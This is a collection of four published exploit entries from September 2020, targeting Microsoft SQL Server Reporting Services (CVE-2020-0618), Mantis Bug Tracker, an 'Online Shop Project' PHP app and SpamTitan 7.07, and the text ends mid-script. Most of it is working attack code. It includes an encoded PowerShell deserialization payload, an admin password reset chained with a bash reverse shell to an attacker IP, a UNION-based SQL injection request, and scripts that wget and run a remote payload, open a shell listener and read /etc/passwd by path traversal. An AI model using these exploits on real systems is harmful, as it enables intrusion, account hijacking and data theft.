# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution # Google Dork: inurl:ReportViewer.aspx # Date: 2020-09-17 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR), Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL Server 2012 32-bit/x64 SP2 (QFE) # Tested on: Windows 2016 # CVE : CVE-2020-0618 # Credit goes to Soroush Dalili # Source: # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618 # https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ #!/usr/bin/python from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth import argparse, requests, logging from bs4 import BeautifulSoup from sys import argv, exit, stderr, stdout # to create a payload (default is bindshell on 0.0.0.0:65535): # .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..." class Exploit: payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAqAUvYyBwb3dlcnNoZWxsLmV4ZSAtZXhlYyBieXBhc3MgLW5vbmludGVyYWN0aXZlIC1ub2V4aXQgLXdpbmRvd3N0eWxlIGhpZGRlbiAtYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5c3RlbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVpYUXVjMjlqYTJWMGN5NTBZM0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTG1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1p5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL' timeout = 0.5 cookies = {} params = {} def __init__(self, opt): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (opt.domain, opt.username) self.target = '%s%s' % (opt.target, opt.path) self.password = opt.password self.session = requests.session() self.redirect = opt.redirect self.proxies = { 'http': 'http://%s' % opt.proxy, 'https': 'http://%s' % opt.proxy } if opt.proxy != '' else {} self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)', 'Content-Type': 'application/x-www-form-urlencoded' } self.form = { '__VIEWSTATE': '', 'NavigationCorrector$PageState': 'NeedsCorrection', 'NavigationCorrector$ViewState': self.payload } if opt.debug: self.debug() def info(self, message): stdout.write('[+] %s\n' % str(message)) return self def error(self, message): stderr.write('[-] error: %s\n' % str(message)) return self def doGet(self, url, params=None, values=None): self.info('sending get request to %s' % url) try: return self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=values, params=params, auth=HttpNtlmAuth(self.username, self.password) ) if self.username != '\\' else self.session.get( url=url, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, data=values, params=params ) except Exception as err: self.error(err) def doPost(self, url, values=None, params=None): self.info('sending post request to %s' % url) try: return self.session.post( url=url, data=values, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params, auth=HttpNtlmAuth(self.username, self.password) ) if self.username != '\\' else self.session.post( url=url, data=values, verify=False, allow_redirects=self.redirect, headers=self.headers, cookies=self.cookies, proxies=self.proxies, params=params ) except Exception as err: self.error(err) def parsePage(self, content): self.info('parsing form values') soup = BeautifulSoup(content, 'lxml') for tag in soup.select('input'): try: self.form[tag['name']] = tag['value'] except Exception as err: self.error(err) return self def debug(self): self.info('debugging enabled') try: import http.client as http_client except ImportError: import httplib as http_client http_client.HTTPConnection.debuglevel = 1 logging.basicConfig() logging.getLogger().setLevel(logging.DEBUG) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True return self def getForm(self): self.info('retrieving form values') resp = self.doGet(url=self.target) self.parsePage(content=resp.content) return self def exploit(self): self.info('exploiting target') resp = self.doPost(url=self.target, params=self.params, values=self.form) self.info('received response %d' % resp.status_code) return self if __name__ == '__main__': parser = argparse.ArgumentParser( description='CVE-2020-0618 SQL Server Reporting Services ViewState Deserialization exploit', add_help=True ) try: parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ') parser.add_argument('-username', action='store', default='', help='Username to use: first.last') parser.add_argument('-domain', action='store', default='', help='User domain to use: domain.local') parser.add_argument('-password', action='store', default='', help='Password to use: Summer2020') parser.add_argument('-debug', action='store', default=False, help='Enable debugging: False') parser.add_argument('-redirect', action='store', default=False, help='Follow redirects: False') parser.add_argument('-proxy', action='store', default='', help='Enable proxy: 10.10.10.10:8080') parser.add_argument('-path', action='store', default='/ReportServer/pages/ReportViewer.aspx', help='Path to page') if len(argv) == 1: parser.print_help() exit(1) options = parser.parse_args() Exploit(opt=options).exploit() except Exception as error: stderr.write('[-] error in main %s\n' % str(error)) Regards, West Shepherd OSWE | OSCE | OSCP | OSWP | CEH | Security+ West Lee Shepherd, LLC

# Exploit Title: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated) # Date: 2020-09-17 # Vulnerability Discovery: hyp3rlinx, permanull # Exploit Author: Nikolas Geiselman # Vendor Homepage: https://mantisbt.org/ # Software Link: https://mantisbt.org/download.php # Version: 1.3.0/2.3.0 # Tested on: Ubuntu 16.04/19.10/20.04 # CVE : CVE-2017-7615, CVE-2019-15715 # References: # https://mantisbt.org/bugs/view.php?id=26091 # https://www.exploit-db.com/exploits/41890 ''' This exploit chains together two CVE's to achieve unauthenticated remote code execution. The first portion of this exploit resets the Administrator password (CVE-2017-7615) discovered by John Page a.k.a hyp3rlinx, this portion was modified from the original https://www.exploit-db.com/exploits/41890. The second portion of this exploit takes advantage of a command injection vulnerability (CVE-2019-15715) discovered by 'permanull' (see references). Usage: Set netcat listener on port 4444 Send exploit with "python exploit.py" Example output: kali@kali:~/Desktop$ python exploit.py Successfully hijacked account! Successfully logged in! Triggering reverse shell Cleaning up Deleting the dot_tool config. Deleting the relationship_graph_enable config. Successfully cleaned up kali@kali:~/Desktop$ nc -nvlp 4444 listening on [any] 4444 ... connect to [192.168.116.135] from (UNKNOWN) [192.168.116.151] 43978 bash: cannot set terminal process group (835): Inappropriate ioctl for device bash: no job control in this shell www-data@ubuntu:/var/www/html/mantisbt-2.3.0$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) ''' import requests from urllib import quote_plus from base64 import b64encode from re import split class exploit(): def __init__(self): self.s = requests.Session() self.headers = dict() # Initialize the headers dictionary self.RHOST = "192.168.116.151" # Victim IP self.RPORT = "80" # Victim port self.LHOST = "192.168.116.135" # Attacker IP self.LPORT = "4444" # Attacker Port self.verify_user_id = "1" # User id for the target account self.realname = "administrator" # Username to hijack self.passwd = "password" # New password after account hijack self.mantisLoc = "/mantisbt-2.3.0" # Location of mantis in URL self.ReverseShell = "echo " + b64encode("bash -i >& /dev/tcp/" + self.LHOST + "/" + self.LPORT + " 0>&1") + " | base64 -d | /bin/bash" # Reverse shell payload def reset_login(self): # Request # 1: Grab the account update token url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/verify.php?id=' + self.verify_user_id + '&confirm_hash=' r = self.s.get(url=url,headers=self.headers) if r.status_code == 404: print "ERROR: Unable to access password reset page" exit() account_update_token = r.text.split('name="account_update_token" value=')[1].split('"')[1] # Request # 2: Reset the account password url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/account_update.php' data = "account_update_token=" + account_update_token + "&password=" + self.passwd + "&verify_user_id=" + self.verify_user_id + "&realname=" + self.realname + "&password_confirm=" + self.passwd self.headers.update({'Content-Type':'application/x-www-form-urlencoded'}) r = self.s.post(url=url, headers=self.headers, data=data) if r.status_code == 200: print "Successfully hijacked account!" def login(self): data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php' r = self.s.post(url=url,headers=self.headers,data=data) if "login_page.php" not in r.url: print "Successfully logged in!" def CreateConfigOption(self, option, value): # Get adm_config_set_token url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_report.php' r = self.s.get(url=url, headers=self.headers) adm_config_set_token = r.text.split('name="adm_config_set_token" value=')[1].split('"')[1] # Create config data = "adm_config_set_token=" + adm_config_set_token + "&user_id=0&original_user_id=0&project_id=0&original_project_id=0&config_option=" + option + "&original_config_option=&type=0&value=" + quote_plus(value) + "&action=create&config_set=Create+Configuration+Option" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_set.php' r = self.s.post(url=url, headers=self.headers, data=data) def TriggerExploit(self): print "Triggering reverse shell" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/workflow_graph_img.php' try: r = self.s.get(url=url,headers=self.headers, timeout=3) except: pass def Cleanup(self): # Delete the config settings that were created to send the reverse shell print "Cleaning up" cleaned_up = False cleanup = requests.Session() CleanupHeaders = dict() CleanupHeaders.update({'Content-Type':'application/x-www-form-urlencoded'}) data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on" url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php' r = cleanup.post(url=url,headers=CleanupHeaders,data=data) ConfigsToCleanup = ['dot_tool','relationship_graph_enable'] for config in ConfigsToCleanup: # Get adm_config_delete_token url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php" r = cleanup.get(url=url, headers=self.headers) test = split('<!-- Repeated Info Rows -->',r.text) # First element of the response list is garbage, delete it del test[0] cleanup_dict = dict() for i in range(len(test)): if config in test[i]: cleanup_dict.update({'config_option':config}) cleanup_dict.update({'adm_config_delete_token':test[i].split('name="adm_config_delete_token" value=')[1].split('"')[1]}) cleanup_dict.update({'user_id':test[i].split('name="user_id" value=')[1].split('"')[1]}) cleanup_dict.update({'project_id':test[i].split('name="project_id" value=')[1].split('"')[1]}) # Delete the config print "Deleting the " + config + " config." url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_delete.php" data = "adm_config_delete_token=" + cleanup_dict['adm_config_delete_token'] + "&user_id=" + cleanup_dict['user_id'] + "&project_id=" + cleanup_dict['project_id'] + "&config_option=" + cleanup_dict['config_option'] + "&_confirmed=1" r = cleanup.post(url=url,headers=CleanupHeaders,data=data) #Confirm if actually cleaned up r = cleanup.get(url="http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php", headers=CleanupHeaders, verify=False) if config in r.text: cleaned_up = False else: cleaned_up = True if cleaned_up == True: print "Successfully cleaned up" else: print "Unable to clean up configs" exploit = exploit() exploit.reset_login() exploit.login() exploit.CreateConfigOption(option="relationship_graph_enable",value="1") exploit.CreateConfigOption(option="dot_tool",value= exploit.ReverseShell + ';') exploit.TriggerExploit() exploit.Cleanup()

# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection # Date: 2020-09-20 # Exploit Author: Augkim # Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip # Tested on: Apache2 GET /shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20- HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Origin: foo.example.org PoC: /URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-

# Exploit Title: SpamTitan 7.07 - Remote Code Execution (Authenticated) # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ # Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 ---[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions) Vulnerability: Multiple Authenticated Remote Code Execution CVSSv3: 8.7 (https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) Severity: High Release Date: 2020-09-18 CVEs: CVE-2020-11699, CVE-2020-11700, CVE-2020-11803, CVE-2020-11804 I. Background ~~~~~~~~~~~~~ From www.spamtitan.com: "SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware." II. Description ~~~~~~~~~~~~~~~ Multiple authenticated remote code execution (RCE) vulnerabilities were found on the SpamTitan Gateway 7.07 and probably in pervious versions: * CVE-2020-11699: Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page. * CVE-2020-11700: Improper sanitization of the parameter fname, used on the page certs-x.php, would allow an attacker to retrieve the contents of arbitrary files. The user has to be authenticated before interacting with this page. * CVE-2020-11803: Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page. * CVE-2020-11804: Due to improper sanitization of the parameter qid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request. III. PoC ~~~~~~~~ Use python 3 and install the following modules before executing: requests. If your IP is 192.168.1.5 and the target SpamTitan server is spamtitan.example.com, call the PoC like this: ./multirce.py -t spamtitan.example.com -i 192.168.1.5 -m <EXPLOIT NUMBER> -u <USER> -p <PASSWORD> -U http://192.168.1.5/rev.py --------------------------------------------- #!/usr/bin/env python # Author: Felipe Molina (@felmoltor) # Date: 09/04/2020 # Python Version: 3.7 # Summary: This is PoC for multiple authenticated RCE and Arbitrary File Read # 0days on SpamTitan 7.07 and previous versions. # Product URL: https://www.spamtitan.com/ # Product Version: 7.07 and probably previous import requests from requests import Timeout requests.packages.urllib3.disable_warnings() import os import threading from optparse import OptionParser import socket import json import re from urllib.parse import urlparse from time import sleep from base64 import b64decode,b64encode def myip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except: IP = '127.0.0.1' finally: s.close() return IP def shellServer(ip,port,quiet): servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) servers.bind((ip, port)) servers.listen(1) info("Waiting for incoming connection on %s:%s" % (ip,port)) conn, addr = servers.accept() conn.settimeout(1) success("Hurray, we got a connection from %s" % addr[0]) prompt =conn.recv(128) prompt=str(prompt.decode("utf-8")).strip() command = input(prompt) while True: try: c = "%s\n" % (command) if (len(c)>0): conn.sendall(c.encode("utf-8")) # Quit the console if command == 'exit': info("\nClosing connection") conn.close() break else: completeanswer="" while True: answer=None try: answer=str((conn.recv(1024)).decode("utf-8")) completeanswer+=answer except socket.timeout: completeanswer.strip() break print(completeanswer,end='') command = input("") except (KeyboardInterrupt, EOFError): info("\nClosing connection") break # This is an authenticated remote code execution in "certs-x.php". E.g: def CVE_2020_11699(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl) t1 = "%s/certs.php" % target t2 = "%s/certs-x.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): csrfguard=m.group(1) csrftoken=m.group(2) data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":"deletecert", "fname":"dummy || $(%s)" % oscmd } info("Triggering the reverse shell in the target.") try: res2 = requests.post(t2,data=data,cookies=cookies,verify=False) print(res2.text) except Timeout: info("Request timed-out. You should have received already your reverse shell.") else: fail("CSRF tokens were not found. POST will fail.") # This is an arbitrary file read on "certs-x.php" def CVE_2020_11700(cookies,target,file): fullpath="../../../..%s" % file t1 = "%s/certs.php" % target t2 = "%s/certs-x.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): csrfguard=m.group(1) csrftoken=m.group(2) data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":"downloadkey", "fname":fullpath, "commonname":"", "organization":"", "organizationunit":"", "city":"", "state":"", "country":"", "csrout":"", "pkout":"", "importcert":"", "importkey":"", "importchain":"" } res2 = requests.post(t2,data=data,cookies=cookies,verify=False) if (res2.status_code == 200): success("Contents of the file %s" % file) print(res2.text) else: fail("Error obtaining the CSRF guard tokens from the page.") return False # This is an authenticated RCE abusing PHP eval function in mailqueue.php def CVE_2020_11803(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl) b64=(b64encode(oscmd.encode("utf-8"))).decode("utf-8") payload="gotopage+a+\";$b=\"%s\";shell_exec(base64_decode(urldecode($b)));die();$b=\"" % (b64) t1 = "%s/certs.php" % target t2 = "%s/mailqueue.php" % target # get the csrf token value res1 = requests.get(t1,cookies=cookies,verify=False) m = re.search("var csrf_token_postdata =.*CSRFName=(.*)&CSRFToken=(.*)\";",res1.text) if (m is not None): csrfguard=m.group(1) csrftoken=m.group(2) data = { "CSRFName":csrfguard, "CSRFToken":csrftoken, "jaction":payload, "activepage":"incoming", "incoming_count":"0", "active_count":"0", "deferred_count":"0", "hold_count":"0", "corrupt_count":"0", "incoming_page":"1", "active_page":"1", "deferred_page":"1", "hold_page":"1", "corrupt_page":"1", "incomingrfilter":None, "incomingfilter":None, "incoming_option":"hold", "activerfilter":None, "activefilter":None, "active_option":"hold", "deferredrfilter":None, "deferredfilter":None, "deferred_option":"hold", "holdrfilter":None, "holdfilter":None, "hold_option":"release", "corruptrfilter":None, "corruptfilter":None, "corrupt_option":"delete" } # We have to pass a string instead of a dict if we don't want the requests library to convert it to # an urlencoded data and break our payload datastr="" cont=0 for k,v in data.items(): datastr+="%s=%s" % (k,v) cont+=1 if (cont<len(data)): datastr+="&" headers={ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Content-Type": "application/x-www-form-urlencoded" } try: res2 = requests.post(t2,data=datastr,cookies=cookies,headers=headers,verify=False,proxies=proxies) except Timeout: info("Request timed-out. You should have received already your reverse shell.") else: fail("CSRF tokens were not found. POST will fail.") # This is an authenticated RCE abusing qid GET parameter in mailqueue.php def CVE_2020_11804(cookies, target, shellurl): # Giving time to the maim thread to open the reverse shell listener sleep(5) oscmd="/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py" % (shellurl) payload="1;`%s`" % oscmd t = "%s/mailqueue.php?qid=%s" % (target,payload) info("Triggering the reverse shell in the target.") try: res2 = requests.get(t,cookies=cookies,verify=False) except Timeout: info("Request timed-out. You should have received already your reverse shell.") # Authenticate to the web platform and get the cookies def authenticate(target,user,password): loginurl="%s/login.php" % target data={ "jaction":"none", "language":"en_US", "address":"%s" % user, "passwd":"%s" % password } res = requests.post(loginurl, data=data,allow_redirects = False,verify=False) if (res.status_code == 302 and len(res.cookies.items())>0): return res.cookies else: return None def printmsg(msg,quiet=False,msgtype="i"): if (not quiet): if (success): print("[%s] %s" % (msgtype,msg)) else: print("[-] %s" % msg) def info(msg,quiet=False): printmsg(msg,quiet,msgtype="i") def success(msg,quiet=False): printmsg(msg,quiet,msgtype="+") def fail(msg,quiet=False): printmsg(msg,quiet,msgtype="-") def parseoptions(): parser = OptionParser() parser.add_option("-t", "--target", dest="target", help="Target SpamTitan URL to attack. E.g.: https://spamtitan.com/", default=None) parser.add_option("-m", "--method", dest="method", help="Exploit number: (1) CVE-2020-11699 [RCE], (2) CVE-2020-XXXX [RCE], (3) CVE-2020-XXXX2 [RCE], (4) CVE-2020-11700 [File Read]", default=1) parser.add_option("-u", "--user", dest="user", help="Username to authenticate with. Default: admin", default="admin") parser.add_option("-p", "--password", dest="password", help="Password to authenticate with. Default: hiadmin", default="hiadmin") parser.add_option("-I", "--ip", dest="ip", help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip()) parser.add_option("-P", "--port", dest="port", help="Local Port where to listen for the reverse shell. Default: 4242", default=4242) parser.add_option("-U", "--URL", dest="shellurl", help="HTTP URL path where the reverse shell is located. Default: http://%s/rev.py" % myip(), default="http://%s/rev.py" % myip()) parser.add_option("-f", "--filetoread", dest="filtetoread", help="Full path of the file to read from the remote server when executing CVE-2020-11700. Default: /etc/passwd", default="/etc/passwd") parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False, help="Shut up script! Just give me the shell.") return parser.parse_args() def main(): (options,arguments) = parseoptions() quiet = options.quiet target = options.target ip = options.ip port = options.port user = options.user password = options.password shellurl = options.shellurl method = int(options.method) rfile = options.filtetoread # Sanitize options if (target is None): fail("Error. Specify a target (-t).") exit(1) else: if (not target.startswith("http://") and not target.startswith("https://")): target = "http://%s" % target if (method < 1 or method > 4): fail("Error. Specify a method from 1 to 4:\n (1) CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2 [RCE]\n (4) CVE-2020-11700 [File Read]") exit(1) # Before doing anything, login cookies = authenticate(target,user,password) if (cookies is not None): success("User logged in successfully.") if (method == 1): info("Exploiting CVE-2020-11699 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11699, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 2): info("Exploiting CVE-2020-11803 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = threading.Thread(target=CVE_2020_11803, args=(cookies,target,shellurl)) rev_thread.start() # Open the reverse shell listener in this main thread info("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) elif (method == 3): info("Exploiting CVE-2020-11804 to get a reverse shell on %s:%s" % (ip,port),quiet) rev_thread = 